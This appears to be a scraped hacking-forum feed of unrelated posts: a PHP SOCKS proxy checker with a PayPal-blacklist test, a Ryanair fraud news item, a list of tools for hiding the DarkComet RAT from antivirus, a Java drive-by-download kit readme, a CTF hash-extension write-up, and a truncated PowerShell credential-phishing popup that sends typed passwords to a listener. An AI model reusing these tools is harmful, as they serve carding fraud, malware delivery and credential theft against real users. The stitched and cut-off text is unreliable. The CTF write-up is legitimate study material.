
  1. Check_Socks_Online_1316466476710.png

    Requires the PHP cURL extension:

    <?php
    // Proxy-list checker: reads a SOCKS list from the form, probes each entry
    // through cURL and prints one result line per proxy, all in one request.

    set_time_limit(0); // no execution limit: the check loop further down can run for a long time
    error_reporting(0); // hides every warning/notice, including the undefined-index notices on the $_POST reads below
    // NOTE(review): `global` at file scope is a no-op; the functions later in the
    // file receive these values as parameters or read $_POST directly.
    global $socks_list,$site,$sockstimeout,$paypaltimeout,$list,$lives;
    // Raw form text; it is echoed back into the textarea later (<?=$socks_list?>)
    // without htmlspecialchars(), so submitted markup is reflected into the page.
    $socks_list = $_POST["sockslist"];
    // Built-in sample illustrating the separators the parser accepts (":", space, "|", "/").
    if (strlen($socks_list)<1) {$socks_list = "82.67.164.189:55525\n71.229.119.8 11465\n67.81.180.167|59931\n211.189.18.165/5818\n";}

    if($_POST["submit"]){
        /**
         * Pulls "ip<sep>port" entries out of free text and normalises the
         * separator to ":".
         *
         * @param string $list raw text; separators matched are ":", "|", "-", whitespace and "/"
         * @return string[] normalised "ip:port" strings (duplicates removed by array_unique)
         */
        function getsocks($list)
        {
            preg_match_all("/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}[:|-\s\/]\d{1,7}/", $list, $socks);
            // NOTE(review): array_unique() preserves the original keys, so once a
            // duplicate has been dropped the index loop below reads missing keys
            // (null, skipped by the strlen() test) and loses the entries after the gap.
            $socks = array_unique($socks[0]);
            $socks2 = array();
            For ($i=0;$i<count($socks);$i++)
            {
                // "Del Port" checkbox: drop entries containing the port1 field's text.
                // NOTE(review): port1 defaults to "1080,8080" and is matched as a single
                // substring, so a comma-separated value never matches one entry — confirm intent.
                if($_POST['port']){
                    If(stristr($socks[$i],$_POST['port1'])){
                        continue;
                    }
                }
                If (strlen($socks[$i]) > 7) $socks2[] = str_replace(array("|", "/", " ", "-"),':',$socks[$i]);
            }
            Return $socks2;
        }

        // Pre-normalise the separators, extract the list, then rebuild the
        // textarea contents as one "ip:port" per line.
        $socks_list = str_replace(" ",":",$socks_list);
        $socks_list = str_replace("|",":",$socks_list);
        $socks_list = str_replace("/",":",$socks_list);
        $AllSocks = getsocks($socks_list);
        $All = count($AllSocks); // also used by the check loop at the bottom of the file
        $socks_list = "";
        For ($i = 1; $i <= $All; $i++)
        {
            $socks_list .= $AllSocks[$i-1]."\n";
        }
    }

    // Target URL for the liveness probe. It is taken verbatim from the form, so
    // the server issues a request to whatever URL the submitter chooses (no
    // allow-list or scheme check).
    $site = $_POST["site"];
    if (strlen($site)<1) {$site = "http://google.com/";}
    // Per-proxy cURL timeout in seconds. With error_reporting(0) a missing field
    // yields null here, so the isset() fallback gives 3. The raw value is later
    // printed into the report heading without escaping.
    $sockstimeout = $_POST["sockstimeout"];
    if (!isset($sockstimeout)) {$sockstimeout = 3;}
    ?>

    <title>-=[ Check Socks Online ]=-</title>

    <style>body{

    font-family:Tahoma;

    font-size:12px;

    background-color:#000000;

    color:#FFFFFF;

    }

    a:link,a:visited,a:active{

    font-family:Tahoma;

    font-size:12px;

    color:#C0C0C0;

    text-decoration:none;

    }

    a:hover{

    color:white;

    text-decoration:none;

    font-family:Tahoma;

    font-size:12px;

    }

    table,tr,td{

    padding:3px;

    font-family:Tahoma;

    font-size:12px;

    background-color:#000000;

    border:1px dotted #C0C0C0;

    }

    input{

    padding:3px;

    font-family:Tahoma;

    font-size:12px;

    background-color:#000000;

    border:1px dotted #C0C0C0;

    color:#C0C0C0;

    }

    textarea{

    padding:3px;

    font-family:Tahoma;

    font-size:12px;

    background-color:#000000;

    border:1px dotted #C0C0C0;

    color:#C0C0C0;

    }

    </style>

    <script type="text/javascript">

    // Client-side tidy-up run from the submit button's onClick: collects
    // "ip:port" / "ip port" matches from the textarea and rewrites it one
    // entry per line (the server re-parses the list anyway).
    function timsock(){
        var slist = window.document.f.sockslist.value;
        var fuck = slist.match(/\d{1,3}([.])\d{1,3}([.])\d{1,3}([.])\d{1,3}((:)|(\s)+)\d{1,8}/g ); // array of matches, or null
        if(fuck){
            var list="";
            for(var i=0;i<fuck.length;i++){
                // NOTE(review): `fuck` is the whole match array here, not `fuck[i]`;
                // arrays have no .match()/.replace(), so this throws a TypeError on the
                // first iteration and the textarea is never rewritten. Presumably the
                // form still submits since nothing cancels the default action — confirm.
                if(fuck.match(/\d{1,3}([.])\d{1,3}([.])\d{1,3}([.])\d{1,3}(\s)+\d{1,8}/g )){
                    fuck=fuck.replace(/(\s)+/,':');
                }
                list=list+fuck+"\n";
            }
            window.document.f.sockslist.value=list;
        }
        else{
            window.document.f.sockslist.value="Not found";
        }
    }

    </script>

    </head>

    <center><h1>-=[ Check Socks Online ]=-</h1></center>

    <form action="" method="post" name="f">
    <!-- The textarea echoes $socks_list straight from the previous POST with no
         htmlspecialchars(); any markup in the submitted list is rendered (reflected XSS). -->
    <center><textarea name="sockslist" cols="150" rows="10"><?=$socks_list?></textarea></center>
    <div align='center'>
    Destination : <input type="text" name="site" size="30" maxlength="200" value="http://google.com" /> -
    <!-- All but the last timeout option use "<?" short tags, which only run with
         short_open_tag enabled; otherwise they are emitted as literal text. -->
    Del Port : <input type=text size=9 name=port1 value= 1080,8080 ><input type=checkbox name=port> - Sock Time-Out : <select name="sockstimeout" ><option value="10" <?If ($sockstimeout == 10) echo 'selected';?> >10s</option><option value="9" <?If ($sockstimeout == 9) echo 'selected';?> >9s</option><option value="8" <?If ($sockstimeout == 8) echo 'selected';?> >8s</option><option value="7" <?If ($sockstimeout == 7) echo 'selected';?> >7s</option><option value="6" <?If ($sockstimeout == 6) echo 'selected';?> >6s</option><option value="5" <?If ($sockstimeout == 5) echo 'selected';?> >5s</option><option value="4" <?If ($sockstimeout == 4) echo 'selected';?> >4s</option><option value="3" <?If ($sockstimeout == 3) echo 'selected';?> >3s</option><option value="2" <?If ($sockstimeout == 2) echo 'selected';?> >2s</option><option value="1" <?php If ($sockstimeout == 1) echo 'selected';?> >1s</option></select> -
    <!-- "Clear" is re-checked from $_POST. The "timeoutpp" field is never read by
         the PHP side; the $paypaltimeout variable it seems meant for is never assigned. -->
    <font color=yellow>Clear Paypal</font> <input name="Clear" type="checkbox" id="Clear" <?php if($_POST['Clear']){ echo 'checked'; } ?>/>
    - PP Time-Out : <input name="timeoutpp" type="text" value=5 size=3 /><br><br>
    <input type="submit" value=" Submit !!! " name="submit" onClick="timsock()"/>
    </div>
    </form>

    <?php

    if($_POST["submit"]){
        $died = ""; // NOTE(review): assigned but never read anywhere in this script
        /**
         * Pushes buffered output to the client so each result line appears as
         * soon as its proxy has been checked, then reopens buffering.
         * After ob_end_flush() closes the buffer, ob_flush() has nothing to act
         * on unless an outer buffer exists; its notice is hidden by error_reporting(0).
         */
        function flush_buffers(){
            ob_end_flush();
            ob_flush();
            flush();
            ob_start();
        }

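    /**
     * Returns the text between the first $start and the next $end after it.
     * Not called anywhere in this script.
     *
     * @param string $string haystack
     * @param string $start  opening delimiter
     * @param string $end    closing delimiter, searched after $start
     * @return string the delimited text, or "" when either delimiter is missing
     */
    function grabdb($string, $start, $end){
        // A leading space is prepended so that a hit at offset 0 of the caller's
        // string is never confused with "not found"; the original `== 0` test is
        // kept as a strict check so `false` and `0` are handled explicitly.
        $string = " ".$string;
        $ini = strpos($string, $start);
        if ($ini === false || $ini === 0) return "";
        $ini += strlen($start);
        $fin = strpos($string, $end, $ini);
        // Previously a missing $end produced a negative length (false - $ini) and
        // substr() returned a slice cut from the tail; report "not found" instead.
        if ($fin === false) return "";
        return substr($string, $ini, $fin - $ini);
    }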

    /**
     * Fetches PayPal's checkout endpoint through the given SOCKS5 proxy and
     * classifies the response.
     *
     * @param string $socks "ip:port"
     * @return int 0 = body received without a "Re-enter password" challenge,
     *             1 = challenge text found, 2 = curl_exec() returned false/empty
     */
    function _checkClearPP($socks){
        // Cookie jar in the working directory. The name is only second-resolution
        // unique (md5 of time()), so concurrent requests share and unlink the same file.
        $cookie = md5(time()).'_pp.txt';
        fclose(fopen($cookie,'w'));
        $postdata = "cmd=_s-xclick&hosted_button_id=DJX2GBY6CSR4N";
        $url = 'https://www.paypal.com/cgi-bin/webscr';
        $agent = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20";
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT, 100); // fixed 100 s, independent of the form's timeout fields
        curl_setopt($ch, CURLOPT_USERAGENT, $agent);
        // Certificate validation is switched off, so the proxy (or anything on the
        // path) can impersonate the endpoint and the text heuristic below then runs
        // on unauthenticated content. VERIFYHOST=1 is not an accepted value on
        // current libcurl — TODO confirm behaviour on the deployed version.
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 1);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_PROXY, $socks);
        curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
        curl_setopt($ch, CURLOPT_POST,true);
        curl_setopt($ch, CURLOPT_POSTFIELDS,$postdata);
        curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
        curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie);
        $step2 = curl_exec($ch);
        unlink($cookie); // jar removed right after the request; the commented-out unlink below is a leftover
        if($step2 == false){ // false on a cURL error, but an empty body compares equal too
            //return 'Curl error: ' . curl_error($ch);
            $cl = 2;
        }else{
            if(stristr($step2,'Re-enter password')){
                $cl = 1;
            }else{
                $cl = 0;
            }
        }
        curl_close($ch);
        //unlink($cookie);
        return $cl;
    }

    /**
     * Geolocates an IP via the ipinfodb v3 ip-city endpoint (plain HTTP,
     * semicolon-separated response).
     *
     * @param string $ip dotted-quad address (interpolated into the URL unencoded)
     * @return array{ip:string,country_code:string,country_name:string,RegionName:string,city:string,ZipPostalCode:string,latitude:string,longitude:string,Timezone:string}
     */
    function ip2location($ip){
        // NOTE(review): the API key is embedded in the source and sent over plain
        // HTTP; it belongs in configuration and the request should use HTTPS.
        // No error handling: on a failed fetch file_get_contents() returns false,
        // explode() yields one empty element and every field below is null
        // (the undefined-offset notices are hidden by error_reporting(0)).
        $d = file_get_contents("http://api.ipinfodb.com/v3/ip-city/?key=5e9a99b4d163bc021ffc97ad634b941b7cbe9f1770ba0e04561f72a3c5770d87&ip=$ip");
        $d = explode(";",$d);
        // Fields 0-2 are skipped; the remaining positions are mapped as named below.
        $country_code = $d[3];
        $country_name = $d[4];
        $region_name = $d[5];
        $city = $d[6];
        $zippostalcode = $d[7];
        $latitude = $d[8];
        $longitude = $d[9];
        $timezone = $d[10];
        // Values are returned raw; the caller inserts them into HTML unescaped.
        return array('ip' => $ip, 'country_code' => $country_code, 'country_name' => $country_name, 'RegionName' => $region_name, 'city' => $city, 'ZipPostalCode' => $zippostalcode, 'latitude' => $latitude, 'longitude' => $longitude, 'Timezone' => $timezone);
    }

    /**
     * Probes one SOCKS5 proxy by fetching $site through it and returns a
     * ready-made HTML result line (Live/Die, connect time, geolocation).
     *
     * @param string $Socks         "ip:port"
     * @param string $site          URL to fetch through the proxy
     * @param int    $sockstimeout  connect and total timeout in seconds
     * @param mixed  $paypaltimeout unused; never assigned anywhere in this script
     * @return string HTML fragment
     */
    Function check($Socks,$site,$sockstimeout,$paypaltimeout){
        // Per-call cookie jar in the working directory; removed at the end of the
        // function. rand() only serves to avoid name collisions here.
        $cookie_file_path = md5(microtime().rand(0,999)).'_cookie.txt';
        $fp = fopen($cookie_file_path,'wb');
        fclose($fp);
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE); // TLS certificate not validated
        curl_setopt($curl, CURLOPT_HEADER, true); // response headers are included in $Exec
        curl_setopt($curl, CURLOPT_POST, true); // probe is a POST with no body
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($curl, CURLOPT_COOKIEJAR, $cookie_file_path);
        curl_setopt($curl, CURLOPT_COOKIEFILE, $cookie_file_path);
        // NOTE(review): HTTPPROXYTUNNEL is an HTTP-proxy option; presumably no effect with SOCKS5 — confirm.
        curl_setopt($curl, CURLOPT_HTTPPROXYTUNNEL, 1);
        curl_setopt($curl, CURLOPT_PROXY, $Socks);
        curl_setopt($curl, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
        curl_setopt($curl, CURLOPT_DNS_CACHE_TIMEOUT,1);
        curl_setopt($curl, CURLOPT_TIMEOUT,$sockstimeout);
        curl_setopt($curl, CURLOPT_CONNECTTIMEOUT,$sockstimeout);
        curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
        // Cache-buster; appends a second "?" if $site already carries a query string.
        $site .= "?".microtime();
        curl_setopt($curl, CURLOPT_URL, $site);
        $Exec = curl_exec($curl);
        $info = curl_getinfo($curl);
        // Split "ip:port"; the port is extracted but not used afterwards.
        $sock1 = explode(":",$Socks);
        $PORT = $sock1[1];
        $sock2 = $sock1[0];
        $sock2 = str_replace(",", ".", $sock2); // tolerate comma-separated octets
        $ip = ip2location($sock2);
        $country_name = $ip['country_name'];
        $region = $ip['RegionName'];
        $city = $ip['city'];
        $postal_code = $ip['ZipPostalCode'];
        if ($country_name == "") $country_name = "Unknown";
        if ($region == "") $region = "Unknown";
        if ($city == "") $city = "Unknown";
        if ($postal_code == "") $postal_code = "Unknown";
        If ($Exec)
        {
            $times = $info['connect_time'];
            if ($_POST['Clear']){
                // NOTE(review): _checkClearPP() is invoked a second time when the first
                // result is not 0, so the proxy is probed twice and the two results can disagree.
                if(_checkClearPP($Socks) == 0){
                    $clpp = "<font color=green>Clear Paypal</font>";
                }elseif(_checkClearPP($Socks) == 1){
                    $clpp = "<font color=red>Blacklist Paypal</font>";
                }else{
                    $clpp = "<font color=darkchild>Unknow</font>"; // "darkchild" is not a CSS colour name
                }
                // Result markup: $Socks and the third-party geolocation fields are
                // concatenated into HTML without htmlspecialchars().
                $Result1 = "<font color='#00DB00'><b>Live</b></font> | <font color='#00DB00'>". $Socks ."</font> | <b>".$clpp."</b> | Times: <font color='yellow'>". $times ."s</font> | City: <font color='white'>". $city ."</font> | State: <font color='#56DB99'>". $region ."</font> | Zipcode: <font color='#FFA500'>". $postal_code ."</font> | Country: <font color='yellow'>". $country_name ."</font><br>";
            }
            else{
                $Result1 = "<font color='#00DB00'><b>Live</b></font> | <font color='#00DB00'>".$Socks."</font> | Times: <font color='yellow'>".$times."s</font> | City: <font color='white'>".$city."</font> | State: <font color='#56DB99'>".$region."</font> | Zipcode: <font color='#FFA500'>".$postal_code."</font> | Country: <font color='yellow'>".$country_name."</font><br>";
            }
        }
        else
        {
            // curl_error() text is likewise inserted unescaped.
            $Result1 = "<font color='red'><b>Die</b></font> | <font color='#00DB00'>".$Socks."</font> | <font color=red>".curl_error($curl)."</font> | City: <font color='white'>".$city."</font> | State: <font color='#56DB99'>".$region."</font> | Zipcode: <font color='#FFA500'>".$postal_code."</font> | Country: <font color='yellow'>".$country_name."</font><br>";
        }
        curl_close($curl);
        unlink($cookie_file_path);
        return $Result1;
    }

    // Report heading; $sockstimeout is the raw form value, printed unescaped.
    echo "<b><center>-=[Checking Socks with timeout $sockstimeout s ]=-</b><br></center>";
    echo "<br><strong>Start Checking $All Socks...</strong><br><hr>";
    // $AllSocks / $All are produced by the parsing block at the top of the file.
    for ($i=1;$i<=$All;$i++){
        if (strlen($AllSocks[$i-1])>10)
        {
            $Socks = $AllSocks[$i-1];
            $s = Check($Socks,$site,$sockstimeout,$paypaltimeout); // function names are case-insensitive in PHP
            // Results are classified by string-matching the returned HTML fragment.
            if(stristr($s,"<b>Live</b>") && stristr($s,"Clear Paypal")){
                echo $i.' | '.$s;
                $lives['cl'][] .= $s; // concatenates onto a fresh null element; presumably meant as `$lives['cl'][] = $s`
            }elseif(stristr($s,"<b>Live</b>")){
                echo $i.' | '.$s;
                $lives['notcl'][] .= $s;
            }
            else{
                echo $i.' | '.$s;
            }
            flush_buffers();
        }
    }
    // NOTE(review): $lives is never initialised; when nothing was live it is
    // undefined and count(null) throws a TypeError on PHP 8 (older versions only
    // warned) — confirm the target PHP version. The same applies to
    // count($lives['cl']) / count($lives['notcl']) below when one bucket is absent.
    if(count($lives)>0){
        echo "<br><strong>List Socks Live</strong></br><hr>";
        if ($_POST['Clear']){
            if(count($lives['cl'])>0){
                foreach($lives['cl'] as $cl){
                    echo $cl;
                }
            }
            if(count($lives['notcl'])>0){
                foreach($lives['notcl'] as $notcl){
                    echo $notcl;
                }
            }
        }else{
            foreach($lives['notcl'] as $li){
                echo $li;
            }
        }
    }
    }

    ?>

    Sursa: Check Script

  2. bug-malware-virus-security-threat-breach-540x334.jpg

    European airline Ryanair has admitted falling victim to a hacking attack that saw €4.6m of the company's money transferred to a bank account in China.

    Law enforcement agencies and financial organisations have already been alerted to the incident, according to reports, and Ryanair is confident that it will get the money back.

    "Ryanair confirms that it has investigated a fraudulent electronic transfer via a Chinese bank last week. The airline has been working with its banks and the relevant authorities and understands that the funds, less than $5m, have now been frozen," the company said.

    "The airline expects these funds to be repaid shortly, and has taken steps to ensure that this type of transfer cannot recur. As this matter is subject to legal proceedings, no further comment will be made."

    The relevant authority in Ryanair's home country of Ireland is the Criminal Assets Bureau, an independent body with powers similar to the local police.

    Like the UK Assets Recovery Agency, the Criminal Assets Bureau focuses on serious crimes and the ability to pursue assets from criminals and compensate victims.

    The airline industry benefits and suffers from its use of technology. American Airlines was forced to ground flights this week because of a software problem. British Airways fell victim to an apparent hack in March that affected its most frequent fliers.

    The company cleared out some of its user accounts and changed log-ins, but it was revealed that the hack was more of a probe on its systems enabled by a leak from another provider.

    "This appears to have been the result of a third party using information obtained elsewhere on the internet, via an automated process, to try to gain access to some accounts," BA said in a statement at the time.

    The incidents underline the perils technology can pose to businesses and the importance of having adequate plans in place should things go wrong.

    Via

  3. This video demonstrates how to make a darkcomet rat undetectable.

    P.S. these are the names of tools needed for it to work:

    1. [C#] Source Code Generator V4.0 Final
    2. DeepSea Obfuscator.v4.0.1.16.full
    3. DNGuard HVM.Enterprise 3.60 cracked-SND
    4. DarkComet Version 5.3.1
    5. Microsoft visual studio

  4. DBD.jpg

    Readme:

    Step 1.) Open game.java and change fileLink to a link to a ZIPPED file that you want to download and execute to the remote pc..
    Step 2.) whilst still in game.java change fileDir to the directory of the computer where you want to download your application to.
    Step 3.) Find out what JDK version you have and edit the three .bat files to correspond to your JDK version - Example:

    "C:\Program Files\Java\jdk1.6.0_16\bin\javac.exe" -cp . *.java

    This shows my version of JDK is 1.6.0_16 if you go to 'C:\Program Files\Java\' and see what version of jdk you had e.g. 1.6.0_21 you would change the three files so that it
    was like so:

    "C:\Program Files\Java\jdk1.6.0_21\bin\javac.exe"

    Step 4.) Run Compile.bat if no errors show then proceed to step 5.
    Step 5.) Run Make JAR-FILE.bat
    Step 6.) Run 'SIGN YOUR JAR.bat' and when prompted enter the password 'java123' it will not show your typing but it will be there after typing 'java123' hit enter.

    Step 7.) Upload yourfile.zip, Client.html, and Client.jar to a webhost, and then send people to http://yourlink.com/Client.html to execute the Drive By Download on them.

    Download

  5. As many of you know, last weekend was Ghost in the Shellcode 2015! There were plenty of fun challenges, and as always I had a great time competing! This will be my first of four writeups, and will be pretty simple (since it simply required me to use a tool that already exists (and that I wrote)

    The level was called "knockers". It's a simple python script that listens on an IPv6 UDP port and, if it gets an appropriately signed request, opens one or more other ports. The specific challenge gave you a signed token to open port 80, and challenged you to open up port 7175. The service itself listened on port 8008 ("BOOB", to go with the "knockers" name).

    You can download the original level here (Python).

    # python2 please

    import sys

    import struct

    import hashlib

    import os

    from binascii import hexlify, unhexlify

    import SocketServer

    import socket

    try:
        from fw import allow
    except ImportError:
        # Fallback when the real firewall hook is not available (e.g. running
        # the level locally): only report what would have been opened.
        def allow(ip,port):
            print 'allowing host ' + ip + ' on port ' + str(port)

    PORT = 8008  # UDP port the knock service listens on
    g_h = hashlib.sha512  # hash used to MAC tokens (set again in main())
    g_key = None  # secret loaded from secret.txt by load_key(); 16 random bytes per 'setup'

    def generate_token(h, k, *pl):
        """Build a token for the given ports as MAC || message.

        The message packs each port as a big-endian uint16 and the MAC is
        h(key || message). Because this is a prefix-keyed hash rather than an
        HMAC, a holder of one valid token can append to the message and
        recompute a valid MAC without the key (hash length extension), which is
        what the writeup below exploits; hmac.new(k, m, h) would not have this property.
        """
        m = struct.pack('!'+'H'*len(pl), *pl)
        mac = h(k+m).digest()
        return mac + m

    def parse_and_verify(h, k, m):
        """Split a token into MAC and message, verify it, and return the port list.

        Returns None when the token is shorter than one digest or the MAC does
        not match. The check recomputes h(key || msg), so it accepts
        length-extended tokens (see generate_token); the `!=` comparison is also
        not constant-time (hmac.compare_digest would be). A trailing odd byte
        in the message is silently ignored.
        """
        ds = h().digest_size
        if len(m) < ds:
            return None
        mac = m[:ds]
        msg = m[ds:]
        if h(k+msg).digest() != mac:
            return None
        port_list = []
        for i in range(0,len(msg),2):
            if i+1 >= len(msg):
                break
            port_list.append(struct.unpack_from('!H', msg, i)[0])
        return port_list

    class KnockersRequestHandler(SocketServer.BaseRequestHandler):
        """Handles one UDP datagram: verify the token, then open each listed port for the sender."""
        def handle(self):
            global g_key
            data, s = self.request  # for the UDP server this is (datagram, socket)
            print 'Client: {} len {}'.format(self.client_address[0],len(data))
            l = parse_and_verify(g_h, g_key, data)
            if l is None:
                print 'bad message'
            else:
                # Every port in a verified token is opened; nothing bounds the count,
                # which is why the extended token in the writeup opens ~100 "port 0" entries.
                for p in l:
                    allow(self.client_address[0], p)

    class KnockersServer(SocketServer.UDPServer):
        # IPv6 UDP listener; the address family is the only customisation.
        address_family = socket.AF_INET6

    def load_key():
        """Read the hex-encoded secret from secret.txt into the g_key global."""
        global g_key
        f=open('secret.txt','rb')
        g_key = unhexlify(f.read())
        f.close()

    def main():
        """CLI dispatcher: setup | newtoken <port...> | serve | knock <host> <token>."""
        global g_h
        global g_key
        g_h = hashlib.sha512
        if len(sys.argv) < 2:
            print '''Usage:
    --- Server ---
    knockers.py setup
    Generates a new secret.txt
    knockers.py newtoken port [port [port ...]]
    Generates a client token for the given ports
    knockers.py serve
    Runs the service
    --- Client ---
    knockers.py knock <host> <token>
    Tells the server to unlock ports allowed by the given token
    '''
        elif sys.argv[1]=='serve':
            load_key()
            server = KnockersServer(('', PORT), KnockersRequestHandler)
            server.serve_forever();
        elif sys.argv[1]=='setup':
            # Fresh 16-byte random secret, stored hex-encoded.
            f = open('secret.txt','wb')
            f.write(hexlify(os.urandom(16)))
            f.close()
            print 'wrote new secret.txt'
        elif sys.argv[1]=='newtoken':
            # Token generation needs the secret, so this runs on the server host.
            load_key()
            ports = map(int,sys.argv[2:])
            print hexlify(generate_token(g_h, g_key, *ports))
        elif sys.argv[1]=='knock':
            # Client side: resolve the host over IPv6/UDP and send the raw token bytes.
            ai = socket.getaddrinfo(sys.argv[2],PORT,socket.AF_INET6,socket.SOCK_DGRAM)
            if len(ai) < 1:
                print 'could not find address: ' + sys.argv[2]
                return
            family, socktype, proto, canonname, sockaddr = ai[0]
            s = socket.socket(family, socktype, proto)
            s.sendto(unhexlify(sys.argv[3]), sockaddr)
        else:
            print 'unrecognized command'

    # Script entry point.
    if __name__ == '__main__':
        main()

    The vulnerability

    To track down the vulnerability, let's have a look at the signature algorithm:

    def generate_token(h, k, *pl):
    m = struct.pack('!'+'H'*len(pl), *pl)
    mac = h(k+m).digest()
    return mac + m

    In that function, h is a hash function (sha-512, specifically), k is a random 16-byte token, randomly generated, and m is an array of 16-bit representation of the ports that the user wishes to open. So if the user wanted to open port 1 and 2, they'd send "\x00\x01\x00\x02", along with the appropriate token (which the server administrator would have to create/send, see below).

    Hmm... it's generating a mac-protected token and string by concatenating strings and hashing them? If you've followed my blog, this might sound very familiar! This is a pure hash extension vulnerability!

    I'm not going to re-iterate what a hash extension vulnerability is in great detail—if you're interested, check out the blog I just linked—but the general idea is that if you generate a message in the form of `msg + H(secret + msg)`, the user can arbitrarily extend the message and generate a new signature! That means if we have access to any port, we have access to every port!

    Let's see how!

    Generating a legit token

    To use the python script linked above, first run 'setup':


    $ python ./knockers.py setup
    wrote new secret.txt

    Which generates a new secret. The secret is just a 16-byte random string that's stored on the server. We don't really need to know what the secret is, but for the curious, if you want to follow along and verify your numbers against mine, it's:

    $ cat secret.txt
    2b396fb91a76307ce31ef7236e7fd3df

    Now we use the tool (on the same host as the secret.txt file) to generate a token that allows access on port 80:

    $ python ./knockers.py newtoken 80
    83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050

    Notice the first 512 bits (64 bytes) is the signature—which is logical, since it's sha512—and the last 16 bits (2 bytes) are 0050, which is the hex representation of 80. We'll split those apart later, when we run hash_extender, but for now let's make sure the token actually works first!

    We start the server:

    $ python ./knockers.py serve

    And in another window, or on another host if you prefer, send the generated token:

    $ python ./knockers.py knock localhost 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050

    In the original window, you'll see that it was successful:

    $ python ./knockers.py serve
    Client: ::1 len 66
    allowing host ::1 on port 80

    Now, let's figure out how to create a token for port 7175!

    Generating an illegit (non-legit?) token

    So this is actually the easiest part. It turns out that the awesome guy who wrote hash_extender (just kidding, he's not awesome) built in everything you needed for this attack!

    Download and compile hash_extender if needed (definitely works on Linux, but I haven't tested on any other platforms—testers are welcome!), and run it with no arguments to get the help dump. You need to pass in the original data (that's "\x00\x80"), the data you want to append (7175 => "\x1c\x07"), the original signature, and the length of the secret (which is 16 bytes). You also need to pass in the types for each of the parameters ("hex") in case the defaults don't match (in this case, they don't—the appended data is assumed to be raw).

    All said and done, here's the command:

    ./hash_extender --data-format hex --data 0050 \
    --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 \
    --append "1c07" --append-format hex \
    -l 16

    You can pass in the algorithm and the desired output format as well, if we don't, it'll just output in every 512-bit-sized hash type. The output defaults to hex, so we're happy with that.

    $ ./hash_extender --data-format hex --data 0050 --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 --append "1c07" --append-format hex -l 16
    Type: sha512
    Secret length: 16
    New signature: 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894
    New string: 005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

    [strike]
    Type: whirlpool
    Secret length: 16
    New signature: f4440caa0da933ed497b3af8088cb78c49374853773435321c7f03730386513912fb7b165121c9d5fb0cb2b8a5958176c4abec35034c2041315bf064de26a659
    New string: 0050800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07[/strike]

    Ignoring the whirlpool token, since that's the wrong algorithm, we now have a new signature and a new string. We can just concatenate them together and use the built-in client to use them:

    $ python ./knockers.py knock localhost 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07

    And checking our server, we see a ton of output, including successfully opening port 7175:

    $ python ./knockers.py serve
    Client: ::1 len 66
    allowing host ::1 on port 80
    Client: ::1 len 178
    allowing host ::1 on port 80
    allowing host ::1 on port 32768
    allowing host ::1 on port 0
    allowing host ::1 on port 0
    [...repeated like 100 times...]
    allowing host ::1 on port 0
    allowing host ::1 on port 0
    allowing host ::1 on port 144
    allowing host ::1 on port 7175

    And that's it! At that point, you can visit http://knockers.2015.ghostintheshellcode.com:7175 and get the key.

    Source skullsecurity

    Metasploit Minute has entered into its 3rd "season". And we kick it off with using the Metasploit capture modules to capture creds from this powershell popup. The cool thing about this is you can leave it to execute on a system without any other code on disk and get creds constantly as any level of user. No admin, no UAC bypass needed. Just a bunch of creds for free.. over SSL. ;–)

    Here is the video:

    Here is the code:

    # Shows a Windows credential prompt pre-filled with the current DOMAIN\user,
    # then turns off TLS certificate validation for the whole process.
    $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[system.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
    $wc = new-object net.webclient;
    # Fixed, non-browser User-Agent; easy to match in proxy logs.
    $wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
    # Reuse the system proxy and the user's cached proxy credentials so the
    # request also works from behind an authenticating proxy.
    $wc.Proxy = [system.Net.WebRequest]::DefaultWebProxy;
    $wc.Proxy.Credentials = [system.Net.CredentialCache]::DefaultNetworkCredentials;
    # The typed password is recovered in clear text and used as the HTTP Basic
    # credential for the request below.
    $wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
    # Single GET to the hard-coded listener; per the msfconsole log further down
